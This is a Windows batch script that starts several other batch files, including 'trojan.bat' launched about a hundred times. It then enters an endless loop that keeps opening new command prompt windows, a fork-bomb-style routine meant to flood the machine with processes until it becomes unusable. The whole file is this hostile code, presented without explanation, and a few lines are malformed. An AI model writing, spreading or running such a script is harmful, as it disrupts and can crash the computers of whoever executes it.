@echo off
start '.bat
start pirate.bat
start smile.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
start trojan.bat
:p
start cmd.exe
/min cmd.exe
goto p
